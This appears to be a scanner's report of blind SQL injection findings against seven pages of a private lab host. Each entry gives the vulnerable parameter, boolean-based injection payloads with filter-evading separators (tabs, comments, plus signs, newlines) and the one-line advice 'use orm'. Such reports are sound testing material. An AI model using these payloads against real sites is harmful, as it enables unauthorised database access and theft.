Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php 
VulnName: bsqli
Query: {'name': "root'\tand\t'99849'='99849"}
payload: '	and	'99849'='99849
'	and	'32341'='32341
'	or	2155=2155#
'	and	'76286'='76287
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example2.php 
VulnName: bsqli
Query: {'name': "root'\tand\t'99849'='99849"}
payload: '	and	'99849'='99849
'	and	'32341'='32341
'	or	2155=2155#
'	and	'76286'='76287
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example3.php 
VulnName: bsqli
Query: {'name': "root'/**/and/**/'62287'='62287"}
payload: '/**/and/**/'62287'='62287
'/**/and/**/'46899'='46899
'/**/or/**/20043=20043#
'/**/and/**/'11645'='11646
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example4.php 
VulnName: bsqli
Query: {'id': '2\tand\t45045=45045'}
payload: 	and	45045=45045
	and	48287=48287
	or	84793=84793#
	and	66990=66991
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example5.php 
VulnName: bsqli
Query: {'id': '2\tand\t45045=45045'}
payload: 	and	45045=45045
	and	48287=48287
	or	84793=84793#
	and	66990=66991
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example6.php 
VulnName: bsqli
Query: {'id': "2'+and+'19389'='19389"}
payload: '+and+'19389'='19389
'+and+'43671'='43671
'+or+19995=19995#
'+and+'36979'='36980
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example7.php 
VulnName: bsqli
Query: {'id': '2\nand\n71482=71482'}
payload: 
and
71482=71482

and
81219=81219

or
82946=82946#

and
67030=67031
advice: use orm
---